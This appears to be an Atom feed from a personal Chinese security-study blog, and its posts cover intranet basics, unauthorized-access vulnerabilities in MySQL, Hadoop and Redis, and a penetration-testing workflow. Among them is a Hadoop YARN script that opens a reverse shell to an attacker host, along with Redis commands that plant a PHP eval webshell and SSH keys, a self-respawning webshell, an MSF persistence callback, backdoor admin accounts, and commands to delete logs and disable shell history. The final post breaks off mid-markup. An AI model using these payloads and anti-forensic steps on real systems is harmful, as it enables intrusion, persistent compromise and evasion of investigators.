<link href="https://myprefer.github.io/post/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8-%E5%9F%BA%E6%9C%AC%E6%A6%82%E5%BF%B5.html"/>
<id>https://myprefer.github.io/post/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8-%E5%9F%BA%E6%9C%AC%E6%A6%82%E5%BF%B5.html</id>
<published>2024-04-10T07:41:44.000Z</published>
<updated>2024-04-11T13:22:59.623Z</updated>
<content type="html"><![CDATA[<h2 id="内网基本概念"><a href="#内网基本概念" class="headerlink" title="内网基本概念"></a>Basic intranet concepts</h2>
<h4 id="局域网"><a href="#局域网" class="headerlink" title="局域网"></a>Local area network</h4>
<p>Also called the intranet: a group of computers interconnected within a certain area.</p>
<h4 id="工作组"><a href="#工作组" class="headerlink" title="工作组"></a>Workgroup</h4>
<p><strong>A workgroup is like a club that anyone can freely join and leave</strong>; it makes it convenient for computers in the same group to access one another. There is no centralized management, and all computers are <strong>peers</strong>.</p>
<ul>
<li>A single network may contain hundreds or thousands of computers. If they were not grouped and were all listed under "Network Neighborhood", it is easy to imagine how chaotic that would be.</li>
<li>To solve this, Windows 9x/NT/2008 introduced the concept of the "<strong>workgroup</strong>", which sorts computers into different groups, usually by function: the Finance department's computers go into a "Finance" workgroup, the HR department's into an "HR" workgroup, and so on.</li>
<li>To access a department's resources, find that department's workgroup name in "Network Neighborhood" and double-click it to see that department's computers.</li>
</ul>
<h4 id="域环境"><a href="#域环境" class="headerlink" title="域环境"></a>Domain environment</h4>
<p><strong>A domain is a collection of computers with a security boundary</strong>. A domain can be thought of as an upgraded workgroup, but one with a strict, centralized management and control mechanism.</p>
<ul>
<li>Unlike the workgroup's "loose membership", a "domain" is a relatively strict organization. A "domain" is a set of computers in which a server controls whether a computer on the network may join.</li>
<li>Strict management is essential for network security. In peer-to-peer mode, any computer can access shared resources as soon as it connects to the network. Shared files on a peer-to-peer network can be protected with an access password, but that password is very easy to crack. In a peer-to-peer network made up of Windows 9x machines, <strong>data is very insecure</strong>.</li>
<li><em>In "domain" mode, at least one server is responsible for authenticating every computer and user that joins the network, acting like the <strong>gatekeeper</strong> of an organization; it is called the "<strong>domain controller (DC)</strong>". The domain controller holds a database made up of the domain's accounts, passwords, the computers that belong to the domain, and so on. When a computer joins the network, the domain controller first checks whether that computer belongs to the domain, whether the logon account exists, and whether the password is correct. If any of this is wrong, the domain controller refuses the user's logon from that computer. Without logging on, the user cannot access the permission-protected resources on the server and can only reach resources shared by Windows as a peer-to-peer user, which <strong>protects</strong> the network's resources to a degree.</em></li>
<li>To join a computer to a domain, it is far from enough for it and the server to see each other in "Network Neighborhood"; a network administrator must perform the domain-join operation for that computer.</li>
</ul>
<h4 id="域控制器-DC"><a href="#域控制器-DC" class="headerlink" title="域控制器-DC"></a>Domain controller (DC)</h4>
<p><strong>The domain controller (DC) is like an organization's access-control system. The DC holds a database made up of the domain's accounts, passwords, the computers that belong to the domain, and so on</strong>.</p>
<p><strong>The DC is the communication hub of the whole domain.</strong></p>
<ul>
<li>The domain controller usually integrates a DNS service that resolves computer names inside the domain (over TCP/IP), which solves the workgroup problem of computers on different subnets being unable to reach one another by computer name.</li>
</ul>
<h4 id="活动目录-AD"><a href="#活动目录-AD" class="headerlink" title="活动目录-AD"></a>Active Directory (AD)</h4>
<p><strong>Active Directory (AD)</strong> is the component that provides directory services in a domain environment.</p>
<p>The information stored in the directory can be users, groups, computers, shared resources, printers, contacts, and so on. The directory service helps users find the information they need from the directory quickly and accurately.</p>
<ul>
<li><p>The main functions Active Directory provides:</p>
<blockquote><p>Centralized account management: all accounts are stored on the server, which makes running commands convenient.</p><p>Centralized software management: push software and install network printers from one place.</p><p>Stronger security: deploy antivirus software and virus-scan tasks uniformly, manage computer permissions centrally, set a uniform user password policy, and so on.</p></blockquote></li>
</ul>
<p>If AD is installed on a computer in the intranet, that computer becomes a DC (the computer that stores the AD database).</p>
<ul>
<li>A DC is essentially a computer; AD is essentially the component that provides the directory service.</li>
</ul>
<h4 id="安全域的划分"><a href="#安全域的划分" class="headerlink" title="安全域的划分"></a>Dividing security domains</h4>
<p>Computers of the same security level are placed in the same network segment, and a firewall at the network border enforces NACLs (network access control policies) toward the other security domains, <strong>so that the risk is minimized</strong>.</p>
<p><strong>Security domains are generally divided into the DMZ and the intranet.</strong></p>
<ul>
<li><p><strong>The DMZ (Demilitarized Zone), also called the isolation zone, is a buffer between the insecure system and the secure system. It was introduced to solve the problem that, once a firewall is installed, the external network can no longer reach the internal network's servers.</strong></p>
<p>The DMZ cannot access the intranet, and the DMZ cannot access the external network (this policy has exceptions, such as mail services).</p></li>
<li><p><strong>The intranet can be further divided into the office area and the core area.</strong></p>
<p>The office area runs antivirus software, host intrusion detection (HIDS) and similar products, and operations staff use a bastion host (jump host) to manage user logons centrally.</p></li>
</ul>
<h4 id="域的分类"><a href="#域的分类" class="headerlink" title="域的分类"></a>Types of domains</h4>
<ul>
<li><p>Single domain</p><p>For example, a parent company and its subsidiary each form their own domain environment; each is a single domain, and from this the notions of <strong>parent domain and child domain</strong> follow.</p></li>
<li><p>Parent domain and child domain</p><p>The parent domain can manage the child domain.</p></li>
<li><p>Domain tree and domain forest</p><p>The domain framework structure; many branches together form a domain forest.</p></li>
</ul>
<h4 id="内网常用命令"><a href="#内网常用命令" class="headerlink" title="内网常用命令"></a>Common intranet commands</h4>
<blockquote><p>net user -> local user list<br>net localgroup administrators -> local administrators (usually includes domain users)<br>net user /domain -> list the domain users<br>net group /domain -> list the groups in the domain<br>net group "domain admins" /domain -> list the domain administrators group<br>net localgroup administrators /domain -> domain administrators logged on to this host<br>net localgroup administrators workgroup\user001 /add -> add a domain user to this host's administrators<br>net group "Domain Controllers" /domain -> list the domain controllers (there may be several)<br>ipconfig /all -> show this host's IP range, domain, and so on<br>net view -> list the machines in the same domain<br>net view /domain -> list the domains<br>net view /domain:domainname -> list the computers in the given domain or workgroup</p></blockquote>
<h4 id="内网渗透基本流程"><a href="#内网渗透基本流程" class="headerlink" title="内网渗透基本流程"></a>Basic intranet penetration workflow</h4>
<ol>
<li><em>Information gathering</em></li>
<li><em>Privilege acquisition</em></li>
<li><em>Lateral movement</em></li>
<li><em>Persistence</em></li>
<li><em>Trace removal</em></li>
</ol>]]></content>
<summary type="html"><h2 id="内网基本概念"><a href="#内网基本概念" class="headerlink" title="Basic intranet concepts"></a>Basic intranet concepts</h2><h4 id="局域网"><a href="#局域网" class="headerlink" title="Local area network</summary>
</entry>
<entry>
<title>Unauthorized Access</title>
<link href="https://myprefer.github.io/post/%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE.html"/>
<id>https://myprefer.github.io/post/%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE.html</id>
<published>2024-03-26T07:47:00.000Z</published>
<updated>2024-03-26T15:09:50.816Z</updated>
<content type="html"><![CDATA[<h3 id="漏洞简述"><a href="#漏洞简述" class="headerlink" title="Vulnerability overview"></a>Vulnerability overview</h3>
<h4 id="描述"><a href="#描述" class="headerlink" title="Description"></a>Description</h4>
<ul><li>An unauthorized access vulnerability is one where an attacker who has not obtained login privileges or authorization, and without entering a password, can reach a site's management console home page or links that are not supposed to be viewable simply by entering their address directly, and can then perform operations there.</li></ul>
<h4 id="危害"><a href="#危害" class="headerlink" title="Impact"></a>Impact</h4>
<ul><li>Leakage of user information and system information</li><li>On some services and systems, unauthorized access also allows executing system commands and manipulating operating-system files, compromising the security of the whole system</li></ul>
<h3 id="漏洞发现"><a href="#漏洞发现" class="headerlink" title="Finding the vulnerability"></a>Finding the vulnerability</h3>
<h5 id="判断服务开放"><a href="#判断服务开放" class="headerlink" title="Determine which services are exposed"></a>Determine which services are exposed</h5>
<ul><li>Nmap port scan</li><li>Combined guessing</li></ul>
<h5 id="判断服务类型"><a href="#判断服务类型" class="headerlink" title="Determine the service type"></a>Determine the service type</h5>
<ul><li>Database</li><li>File transfer</li><li>Remote control</li><li>Data communication</li></ul>
<h3 id="漏洞实例"><a href="#漏洞实例" class="headerlink" title="Vulnerability examples"></a>Vulnerability examples</h3>
<h4 id="MySQL"><a href="#MySQL" class="headerlink" title="MySQL"></a>MySQL</h4>
<ul><li><p>Environment: <a href="https://vulhub.org/#/environments/mysql/CVE-2012-2122/">MySQL authentication bypass vulnerability (CVE-2012-2122)</a></p></li>
<li><p>Principle:</p><blockquote><p>When connecting to MariaDB/MySQL, the entered password is compared with the expected correct password. Because of incorrect handling, even when memcmp() returns a non-zero value MySQL may still consider the two passwords equal. In other words, <strong>knowing only the username</strong>, repeated attempts can <strong>log straight into</strong> the SQL database.</p></blockquote></li>
<li><p>Exploitation:</p><div class="language-sh"><pre><code>for i in `seq 1 1000`; do mysql -uroot -pwrong -h your-ip -P3306 ; done</code></pre></div></li></ul>
<h4 id="Hadoop"><a href="#Hadoop" class="headerlink" title="Hadoop"></a>Hadoop</h4>
<ul><li><p>Environment: <a href="https://vulhub.org/#/environments/hadoop/unauthorized-yarn/">Vulhub - Docker-Compose file for vulnerability environment</a></p></li>
<li><p>Principle:</p><blockquote><p>The management UI of the ResourceManager component, which is responsible for unified resource management and scheduling, is exposed on port 8080/8088. An attacker <strong>needs no authentication</strong> to deploy a task through the REST API and <strong>execute arbitrary commands</strong>, and can ultimately take full control of every machine in the cluster.</p></blockquote></li>
<li><p>Script:</p><div class="language-python"><pre><code>#!/usr/bin/env python

import requests

target = 'http://127.0.0.1:8088/'
lhost = '192.168.0.1'  # put your local host ip here, and listen at port 9999

url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)
</code></pre></div></li></ul>
<h4 id="Redis"><a href="#Redis" class="headerlink" title="Redis"></a>Redis</h4>
<ul><li><p>Principle:</p><ul><li>Redis has no password authentication by default, so it can be logged into and operated without a password; an attacker can go on to control the server by manipulating Redis</li>
<li>On versions before 4.x/5.0.5, unauthorized Redis access allows loading a remote module through master/slave mode and executing arbitrary commands by way of a dynamic shared library.</li></ul></li>
<li><p>Exploitation:</p><ul><li><p>Writing a webshell</p><ul><li><p>Prerequisites:</p><ol><li><p>The target's Redis is accessible without authorization: it can be reached with redis-cli from the attacking machine with no login authentication</p></li><li><p>A web server is running and its path is known, and there must be permission to read, write, create, modify and delete files there</p></li></ol></li>
<li><p>Upload the webshell</p><div class="language-sh"><pre><code>config get dir  # show the Redis database directory
config set dir /root/redis-2.8.17  # change the target's Redis database directory
config set dbfilename 22.php  # generate the file 22.php
set xxx "\r\n\r\n<?php phpinfo();?>\r\n\r\n"  # write the one-line webshell into the file
# "\r\n\r\n" means line breaks: files written by Redis carry some version information, and without the line breaks the code may fail to execute.
set xxx "\r\n\r\n<?php eval($_POST[whoami]);?>\r\n\r\n"  # the uploaded shell can be connected to with AntSword (蚁剑)
save  # save</code></pre></div></li></ul></li>
<li><p>SSH key login</p><ul><li><p>Prerequisites:</p><ol><li>Redis runs as root</li><li>The /root/.ssh directory exists</li></ol></li>
<li><p>Upload the public key to the target</p><div class="language-sh"><pre><code>type key.txt | redis-cli.exe -h 192.168.43.141 -x set xxx  # on Linux, replace type with cat
# insert the public key into the database as the value; the key name can be anything.
redis-cli.exe -h 192.168.43.141 config set dir /root/.ssh
# change the Redis database directory
redis-cli.exe -h 192.168.43.141 config set dbfilename authorized_keys
# generate the dump file authorized_keys
redis-cli.exe -h 192.168.43.141 save
# save
ssh -i id_rsa root@192.168.43.141
# connect</code></pre></div></li></ul></li>
<li><p>Automated RCE exploitation script<br><a href="https://github.com/vulhub/redis-rogue-getshell">vulhub/redis-rogue-getshell: redis 4.x/5.x master/slave getshell module (github.com)</a></p></li></ul></li></ul>
<h3 id="常见漏洞汇总"><a href="#常见漏洞汇总" class="headerlink" title="Summary of common vulnerabilities"></a>Summary of common vulnerabilities</h3>
<ul><li><p><a href="https://www.freebuf.com/articles/web/338459.html">A roundup of 30+ common unauthorized access vulnerabilities - FreeBuf</a></p></li><li><p><a href="https://mp.weixin.qq.com/s/IK7n5onsyssmJyf5SPpw6A">Weekly security study | Summary of common unauthorized access vulnerabilities</a></p></li></ul>
<h3 id="漏洞防范"><a href="#漏洞防范" class="headerlink" title="Prevention"></a>Prevention</h3>]]></content>
<summary type="html"><h3 id="漏洞简述"><a href="#漏洞简述" class="headerlink" title="Vulnerability overview"></a>Vulnerability overview</h3><h4 id="描述"><a href="#描述" class="headerlink" title="Description"></a>Description</h</summary>
<category term="网络安全" scheme="https://myprefer.github.io/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/"/>
<category term="学习日志" scheme="https://myprefer.github.io/tags/%E5%AD%A6%E4%B9%A0%E6%97%A5%E5%BF%97/"/>
</entry>
<entry>
<title>(Repost) Penetration testing: basic workflow</title>
<link href="https://myprefer.github.io/post/%E8%BD%AC-%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-%E5%9F%BA%E6%9C%AC%E6%B5%81%E7%A8%8B.html"/>
<id>https://myprefer.github.io/post/%E8%BD%AC-%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95-%E5%9F%BA%E6%9C%AC%E6%B5%81%E7%A8%8B.html</id>
<published>2024-03-21T14:50:33.000Z</published>
<updated>2024-03-21T14:51:34.220Z</updated>
<content type="html"><![CDATA[<p>Generally speaking, the basic workflow of a penetration test is as follows:</p>
<ol><li>Define the target</li><li>Information gathering</li><li>Vulnerability detection</li><li>Vulnerability exploitation (getshell)</li><li>Intranet forwarding</li><li>Intranet penetration</li><li>Trace removal</li><li>Write the penetration test report</li></ol>
<h2 id="一-确定目标"><a href="#一-确定目标" class="headerlink" title="1. Define the target"></a><strong>1. Define the target</strong></h2>
<p>Not much to say here: decide what your penetration target is.</p>
<h2 id="二-信息收集"><a href="#二-信息收集" class="headerlink" title="2. Information gathering"></a><strong>2. Information gathering</strong></h2>
<p><strong>Information gathering is the most important step of the whole penetration test</strong>: you must fully map out the target you are going to attack before you can attack it well. <strong>The richer the information and the more intelligence you gather, the higher the success rate of the attack.</strong></p>
<p>So what exactly should be gathered? Below I have compiled the information that commonly needs to be collected in a penetration test.</p>
<p><strong>1. Host scanning (Nessus)</strong></p>
<p>Scan the target host, not just the website: which ports the target host has open, which services run on those ports, and which vulnerabilities the host has.</p>
<p>There are many host-scanning tools, for example Nessus.</p>
<p><strong>2. Port scanning (nmap)</strong></p>
<p>You need to know which ports the target server has open. Common ones such as 135, 137, 138, 139 and 445 frequently have vulnerabilities. Some service ports and their vulnerabilities:</p>
<p>22 ——> SSH weak password</p>
<p>873 ——> rsync unauthorized access vulnerability</p>
<p>3306 ——> MySQL weak password</p>
<p>6379 ——> Redis unauthorized access vulnerability</p>
<p>Port-scanning tools include nmap and masscan. nmap is more accurate but scans slowly; masscan scans fast but is less accurate.</p>
<p><strong>3. Sensitive website directories and files</strong></p>
<p>Scan the website's directory structure to see whether directories can be listed or sensitive files are leaked</p>
<ul><li>Admin directory: weak passwords, universal passwords, brute force</li><li>Installation packages: obtain database information, even the site's source code</li><li>Upload directory: truncation, uploading image-embedded shells, etc.</li><li>MySQL management interface: weak passwords, brute force, universal passwords, then dump the database, even get a shell</li><li>Installation page: may allow a second installation and thereby a bypass</li><li>phpinfo: exposes all kinds of configuration information</li><li>Editors: fck, ke, etc.</li><li>IIS short-filename exploitation: conditions are rather strict; Windows, Apache, etc.</li></ul>
<p>Having mentioned sensitive website directories, we have to mention the robots.txt file</p>
<p>robots.txt is a plain-text file written specifically for search-engine robots. In it we can specify which directories of the site we do not want robots to visit. That way, part or all of the site's content is kept out of search-engine indexes, or the search engine indexes only the specified content. We can therefore use robots.txt to keep Google's robot away from the important files on our site, and the threat of Google hacking goes away.</p>
<p>Suppose the robots.txt file is written as follows:</p>
<div class="language-txt"><pre><code>User-agent: *
Disallow: /data/
Disallow: /db/
Disallow: /admin/
Disallow: /manager/
Allow:/images/</code></pre></div>
<p>The paths after the "Disallow" parameter are the parts robots are forbidden to index; for example, to stop robots indexing the "data" folder under the site root, just put /data/ after Disallow. To add other directories, continue in the same format. When the file is finished, upload it to the site's root directory and the site is kept away from Google hacking.</p>
<p>Although the purpose of the robots file is to keep search spiders from crawling the pages you want to protect, if we know the robots file's contents we know which folders the target site does not want visited, which indirectly tells us those folders are important.</p>
<p>Tools for probing a target site's admin directories include: wwwscan, Yujian (御剑), dirbuster, cansina, etc.</p>
<p><strong>4. Side-site and C-segment scanning</strong></p>
<p>Side sites are the other websites on the same server. Often a particular website is not so easy to break into; in that case, check whether the server hosting it has other websites. If it does, you can first take a webshell on one of the other sites, then escalate privileges to gain control of the server, and the original site naturally falls with it.</p>
<p>For red-versus-blue exercises and HVV (护网) operations, C-segment scanning is quite meaningful; for a penetration test of a single website it is of little value. The C segment refers to the other servers in the same intranet segment. Every IP has four segments, A, B, C and D: for 192.168.0.1 the A segment is 192, B is 168, C is 0 and D is 1. C-segment sniffing means compromising one of the servers in the same C segment, that is, one of the servers with D segment 1-255, and then using tools to sniff traffic and take over the server.</p>
<p><strong>5. Website vulnerability scanning</strong></p>
<p>Website vulnerability scanning probes the website directly for vulnerabilities. There are many tools for this, such as AWVS, AppScan, OWASP ZAP, Nessus, and so on. Note, however, that running a vulnerability scanner straight against a website generates a burst of traffic that can bring some sites down, so it is generally best not to scan a website with such tools. And scanning a website with a vulnerability scanner without authorization is illegal!</p>
<p><strong>6. Website fingerprinting</strong></p>
<p>Fingerprinting the target server is essential in a penetration test, because only once the web container or CMS has been identified can related vulnerabilities be looked up and the corresponding penetration steps carried out. A CMS is also called a whole-site system. Common CMSs include WordPress, DedeCMS, Discuz, PhpWeb, PhpWind, Dvbbs, PhpCMS, ECShop, SiteWeaver, AspCMS, EmpireCMS (帝国), Z-Blog, and so on.</p>
<p>Common website fingerprinting tools include whatweb and others.</p>
<p><strong>7. Gathering sensitive company information online</strong></p>
<p>Once the company is known, we can search the internet for any information related to it, such as its e-mail address format, employee names, and anything else connected to the company. We can also search code-hosting platforms such as GitHub and Gitee (码云) for related sensitive information: some careless programmers upload code without sanitizing it, so the uploaded code may contain database connection details, e-mail passwords, and possibly leaked source code.</p>
<p><strong>8. Domain name information gathering</strong></p>
<p>Once the penetration target is set, which means we know its domain name, the next step is to collect the IP the domain resolves to, its WHOIS information, its subdomains, and the whole range of other domain-related information.</p>
<p>Determining the domain's IP: first, determine whether the domain is behind a CDN. This can be done at an online CDN lookup site such as the multi-location ping and site speed test at 站长工具 (Webmaster Tools). If the lookup returns more than one IP, the IP is not the real server address. In my experience, if there are two or three and they belong to different carriers in the same region, they are very likely the server's egress addresses: the server sits in an intranet and is exposed to the internet through NAT mappings of different carriers, with several carriers used for load balancing and hot standby. If there are many IPs spread across different regions, it is almost certainly a CDN.</p>
<p>The domain's WHOIS information: WHOIS is a transfer protocol for querying the registered owner of a domain and related information. Simply put, WHOIS is a database for checking whether a domain has been registered and for the details of the registration (such as the domain owner and the registrar); domain information is looked up through WHOIS queries. Early WHOIS lookups were mostly command-line tools, but web-based online tools have since appeared that simplify lookups and can query several databases at once. The web tools still rely on the WHOIS protocol to send queries to the servers, and the command-line tools are still widely used by system administrators. WHOIS normally uses TCP port 43. Each domain's or IP's WHOIS information is kept by the corresponding registry.</p>
<h2 id="三-漏洞探测"><a href="#三-漏洞探测" class="headerlink" title="3. Vulnerability detection"></a>3. Vulnerability detection</h2>
<p>Once enough information has been gathered, we start probing the website for vulnerabilities, checking whether it has common web vulnerabilities such as:</p>
<ul><li>SQL injection</li><li>XSS (cross-site scripting)</li><li>CSRF (cross-site request forgery)</li><li>XXE</li><li>SSRF (server-side request forgery)</li><li>File inclusion</li><li>File upload</li><li>File parsing</li><li>Remote code execution</li><li>CORS (cross-origin resource sharing) vulnerabilities</li><li>Broken access control (privilege bypass)</li><li>Directory listing and arbitrary file read/download</li><li>Struts2 vulnerabilities</li><li>Java deserialization</li></ul>
<p>These are vulnerabilities frequently found on websites; there are others that I will not list one by one here.</p>
<p>There are also many website vulnerability scanners, for example:</p>
<ul><li>AWVS</li><li>AppScan</li><li>OWASP ZAP</li><li>Nessus</li></ul>
<p>I list only these few scanners; there are many more, but these are the most commonly used!</p>
<h2 id="四-漏洞利用"><a href="#四-漏洞利用" class="headerlink" title="4. Vulnerability exploitation"></a>4. Vulnerability exploitation</h2>
<p>Once a vulnerability has been found on the website, we exploit it. Different vulnerabilities have different exploitation tools, and very often a single vulnerability is not enough to get a webshell; we usually need to chain several. Commonly used exploitation tools:</p>
<p>SQL injection ——> sqlmap</p>
<p>XSS ——> BeEF-XSS</p>
<p>Intercepting and modifying requests ——> Burp Suite, Fiddler</p>
<p>File upload: for upload vulnerabilities we normally upload a one-line webshell and then obtain a full webshell from it; see ——> Webshells and one-line webshells</p>
<p>However, the privileges obtained with a webshell are usually low, so we need to escalate. We can bounce an MSF-type shell for escalation (Using Metasploit Framework (MSF); Generating a backdoor with msfvenom), or a Cobalt Strike-type shell (Using the penetration tool Cobalt Strike), or link MSF and Cobalt Strike together (MSF and Cobalt Strike linkage), or use other escalation methods: Windows privilege escalation, Linux privilege escalation</p>
<h2 id="五-内网转发"><a href="#五-内网转发" class="headerlink" title="5. Intranet forwarding"></a>5. Intranet forwarding</h2>
<p>Once we have a webshell on the website, if we want information about the host we can swap the webshell for an MSF shell: generate a payload, run it through the webshell client (China Chopper, 菜刀), and we receive an MSF-type shell.</p>
<p>If we want to probe the intranet hosts further, we need intranet forwarding. We cannot communicate with intranet hosts directly, so we use the compromised web server as the relay to talk to them.</p>
<h2 id="六-内网横向渗透"><a href="#六-内网横向渗透" class="headerlink" title="6. Intranet lateral penetration"></a>6. Intranet lateral penetration</h2>
<p>Once we have gained privileges on the external-facing server and are inside the system, we try every way to find the information we want on that server.</p>
<p>On Windows hosts, it pays to browse directories; there can be many unexpected finds. Many people keep account passwords and other easily forgotten things in notes or on the desktop. We can also look for database connection files and read the database account and password and other sensitive information. Once we have a Windows account password, or have created a new user, we avoid using Remote Desktop as far as possible so as not to be noticed by the site administrator and not to disrupt the server. Remote Desktop is noisy: if the server administrator is also logged in when you log in over RDP, you kick the administrator off, and you will very quickly be kicked off by the administrator in turn. If RDP really is necessary, avoid creating a new user for it; instead activate the guest account, add it to the administrators group, and log in as guest. After logging in over RDP, look at which software is on other users' desktops and in other directories. What we are looking for:</p>
<ul><li>FTP-related software</li><li>Database-related software</li><li>Open the browser and check its history and whether any sites have saved passwords; use tools to view the browser's saved passwords</li></ul>
<p>The account passwords found on this host can be turned into a dictionary; when brute-forcing other machines in the intranet, the same passwords are very likely reused.</p>
<div class="language-txt"><pre><code>net user guest /active:yes #activate the guest account
net localgroup administrators guest /add #add guest to the administrators group
net user guest PASSWORD #change the guest account's password
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f #enable port 3389</code></pre></div>
<p>On Linux hosts, we can check the open ports, the running services, and which intranet hosts have connections established with it; browse directories and look for the website's database connection password. In short, find as many account passwords as possible; they are very useful for brute-forcing accounts in the intranet.</p>
<p>Once a tunnel into the intranet is set up, the first task is asset discovery on the intranet. Determining which intranet segments are live is a big problem: the intranet may contain the 10.0.0.0/8, 172.16.0.0/16 and 192.168.0.0/24 segments at the same time, so a scanner is needed to probe them. Scanning the intranet through a proxy with nmap is not recommended. If scanning from a local host through a proxy with a GUI is possible, RouterScan, the Yujian high-speed full-TCP-port scanner (御剑高速TCP全端口扫描器) or IIS_Scanner can be used, but keep the thread count low or the proxy will easily collapse. For a command-line scanner, the S scanner can be used. After scanning the intranet's assets and open ports, port 445 can be hit with MS17_010, but note that hitting 445 through a proxy differs from before; see ——> Intranet penetration with MS17-010. Port 3389 can be hit with CVE-2019-0708; see ——> Reproducing the CVE-2019-0708 Remote Desktop vulnerability. Ports such as 1433/3306/6379 can be brute-forced, with a higher success rate using the account passwords collected earlier.</p>
<p><strong>Persistence</strong></p>
<p>After gaining privileges on the target host, we very possibly cannot get what we want right away and need to lurk for a long time, especially in intranet penetration, where prolonged information gathering is required. Persistence is then very important: we need to maintain the privileges we have obtained.</p>
<p><strong>Web backdoors</strong></p>
<p>1: Hide the backdoor file (set the file as hidden)</p>
<p>2: An "undying shell": this script creates test.php on the server every 5 seconds and writes an AV-evading one-line webshell into it. Combined with the attrib command to hide the file, it makes a better backdoor.</p>
<div class="language-txt"><pre><code><?php
 set_time_limit(0);//script execution time limit
 ignore_user_abort(1);//the script keeps running after the client disconnects
 unlink(__FILE__);//the file's full name; deletes this script itself
 while(1){
 file_put_contents('test.php','<?php $a=array($_REQUEST["x"]=>"3");
 $b=array_keys($a)[0];
 eval($b);?>');
 sleep(5);
 }
?></code></pre></div>
<p>3: Hide the backdoor in the 404 page, or insert backdoor code into other files that ship with the site</p>
<p>Note: all of the backdoor methods above can be detected by tools such as D盾 (D-Shield)</p>
<p><strong>Windows systems</strong></p>
<p>1: Create a hidden user by appending $ to the username</p>
<p>2: Place a trojan file in the startup folder; whenever the target machine reboots, it calls back to our remote-control server</p>
<p>3: The persistence module in MSF; running it makes the target machine reconnect to the remote-control server automatically at a fixed interval, but it is easily discovered</p>
<div class="language-txt"><pre><code>#callback interval is 5 s; it automatically connects to port 4444 on 192.168.27; the drawback is that antivirus software catches it easily
run persistence -X -i 5 -p 8888 -r 192.168.10.27 
 
#it then creates this file on the target: C:\Windows\TEMP\CJzhFlNOWa.vbs, and adds the service to the registry so it starts at boot</code></pre></div>
<p>4: In a domain environment, try to obtain the hash of the krbtgt account; that hash can be used for pass-the-ticket attacks, and its password is generally changed rarely.</p>
<p>5: Sticky-keys (shift) backdoor</p>
<p>6: Remote Desktop session hijacking</p>
<p><strong>Linux systems</strong></p>
<p>1: SSH backdoor</p>
<p>2: crontab scheduled task</p>
<p>3: SSH public key</p>
<p>4: Create a user with SUID=0</p>
<h2 id="七-痕迹清除"><a href="#七-痕迹清除" class="headerlink" title="7. Trace removal"></a>7. Trace removal</h2>
<p>After achieving the goal, some people only want to deface the site to show off; or leave a backdoor and use the box as a zombie to wander around when bored; or plant a mining trojan. Do not do any of these; they are all illegal!</p>
<p>Here I only show how to remove part of the traces we leave after getting in; it cannot remove everything, and completely erasing intrusion traces is impossible! The main aim is to raise the time and labor cost for the administrator to find the intruder. As long as the administrator wants to investigate, no matter how you clean up, it can still be found.</p>
<p>The main thing is to hide your own identity: the best approach is to go through a proxy before the penetration and then clean up traces afterwards.</p>
<p>Windows systems</p>
<p>1: On Windows, the clearev command in MSF can be used to clear traces</p>
<p>2: If you logged in over 3389, the mstsc traces need to be cleared</p>
<p>3: Run a command to clear logs:</p>
<div class="language-txt"><pre><code>del %WINDR%\* .log /a/s/q/f</code></pre></div>
<p>4: For web applications, find the web log files and delete them</p>
<p>Linux systems</p>
<p>1: On Linux, run the following after gaining access so that the commands you type are not recorded</p>
<div class="language-txt"><pre><code>export HISTFILE=/dev/null export HISTSIZE=0</code></pre></div>
<p>2: Delete the log files under /var/log</p>
<p>3: For web applications, find the web log files and delete them</p>
<h3 id="八-撰写渗透测试保告"><a href="#八-撰写渗透测试保告" class="headerlink" title="8. Writing the penetration test report"></a>8. Writing the penetration test report</h3>]]></content>
<summary type="html"><p>In general, the basic penetration-testing workflow is as follows:</p>
<ol>
<li>Define the target</li>
<li>Information gathering</li>
<li>Vulnerability detection</li>
<li>Vulnerability exploitation (getshell)</li>
<li>Internal network forwarding</li>
<li>Internal network penetration</li>
<li>Trace clearing</li>
<li></summary>
</entry>
<entry>
<title>Web Attack and Defense: Deserialization</title>
<link href="https://myprefer.github.io/post/WEB%E6%94%BB%E9%98%B2-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96.html"/>
<id>https://myprefer.github.io/post/WEB%E6%94%BB%E9%98%B2-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96.html</id>
<published>2024-03-18T13:45:44.000Z</published>
<updated>2024-04-21T10:30:45.807Z</updated>
<content type="html"><![CDATA[<h1 id="反序列化"><a href="#反序列化" class="headerlink" title="Deserialization"></a>Deserialization</h1><h4 id="什么是反序列化"><a href="#什么是反序列化" class="headerlink" title="What is deserialization"></a>What is deserialization</h4><p><em><strong>Format conversion</strong></em></p><ul><li>Serialization: converting an object into an array, string or similar format</li><li>Deserialization: converting an array, string or similar format back into an object</li></ul><p><img src="https://i0.imgs.ovh/2024/03/17/e3gfp.png" alt="e3gfp.png"></p><h2 id="PHP反序列化"><a href="#PHP反序列化" class="headerlink" title="PHP deserialization"></a>PHP deserialization</h2><h4 id="漏洞产生原因"><a href="#漏洞产生原因" class="headerlink" title="Why the vulnerability arises"></a>Why the vulnerability arises</h4><p><em><strong>Magic methods</strong></em></p><ul><li>Trigger conditions: the variable passed to unserialize() is attacker-controlled, the file contains a usable class, and that class defines magic methods</li></ul><div class="language-php"><span class="lang">php</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #82AAFF">__construct</span><span style="color: #89DDFF">():</span><span style="color: #676E95; font-style: italic">//constructor, called automatically when the object is created with new</span></span><span class="line"></span><span class="line"><span style="color: #82AAFF">__destruct</span><span style="color: #89DDFF">():</span><span style="color: #676E95; font-style: italic">//destructor, called automatically when the object is destroyed</span></span><span class="line"></span><span class="line"><span style="color: #82AAFF">__wakeup</span><span style="color: #89DDFF">():</span><span style="color: #676E95; font-style: italic">//called automatically during unserialize()</span></span><span class="line"></span><span class="line"><span style="color: 